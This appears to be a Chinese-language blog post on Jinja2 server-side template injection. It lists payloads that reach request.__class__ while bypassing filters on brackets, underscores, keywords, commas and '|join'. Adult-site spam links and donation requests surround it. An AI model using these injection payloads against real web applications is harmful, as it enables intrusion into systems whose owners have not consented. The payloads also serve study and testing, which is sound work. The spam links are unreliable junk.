亚洲免费在线-亚洲免费在线播放-亚洲免费在线观看-亚洲免费在线观看视频-亚洲免费在线看-亚洲免费在线视频

python SSTI繞過

系統 2083 0

原理
首先以jinja2模板注入為例:
{{request[request.args.param]}} 可以用 {{request|attr(request.args.param)}} 替代繞過"["、"]"過濾
繞過的方式也就是同義語句轉化,下面給出其他的替換繞過"_"字符:
?exp={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&usc=_&class=class
等同于 ?exp={{request|attr(["_"*2,"class","_"*2]|join)}}
等同于 ?exp={{request|attr(["__","class","__"]|join)}}
等同于 ?exp={{request|attr("__class__")}}
等同于 ?exp={{request.__class__}}

下面給出一些繞過姿勢,假如頁面本身注入參數為exploit,想注入的的語句為request.__class__
①繞過 "]"、"["、"_"、class等關鍵字
使用元組( )和通過傳遞另外的參數
?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&usc=_&class=class
使用.getlist()優化(能夠繞過",")
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
②繞過"|join"
使用|format函數,可以通過傳入格式字符串%s,再傳入字符,來進行替換
?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)|join
)}}&f=%s%sclass%s%s&a=_


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 天天操天天透 | 一级毛片在线看 | 亚洲在线一区 | 99国产精品高清一区二区二区 | 国产欧美在线视频免费 | 毛片在线观看网站 | 尤物视频一区二区 | 亚洲成a人 | 一级片在线观看视频 | 色综合视频一区二区三区 | 99久久国产免费福利 | 国产高清区 | 秋霞伊人 | 99久久在线| 免费一级网站 | 中文字幕欧美亚洲 | 一个色的综合 | jizz中国zz女人18 | 毛片大全在线 | 色综合伊人色综合网亚洲欧洲 | 自拍亚洲午夜伦li片影院 | 婷婷操 | 性欧美高清久久久久久久 | 国产乱码一区二区三区 | 60欧美老妇做爰视频 | 久久美女| 五月综合激情久久婷婷 | 波多野结衣一区二区三区四区 | 精品久久在线 | 国产99视频精品免费视频7 | 日韩中文字幕在线观看视频 | 久久成人国产精品二三区 | 手机看片国产免费久久网 | 男女拍拍视频黄的全免费 | 日本免费中文字幕在线看 | 手机看片福利日韩国产 | 福利视频国产 | 亚洲va在线va天堂成人 | 成人国产精品一区二区网站 | 青青91视频| 在线视频欧美日韩 |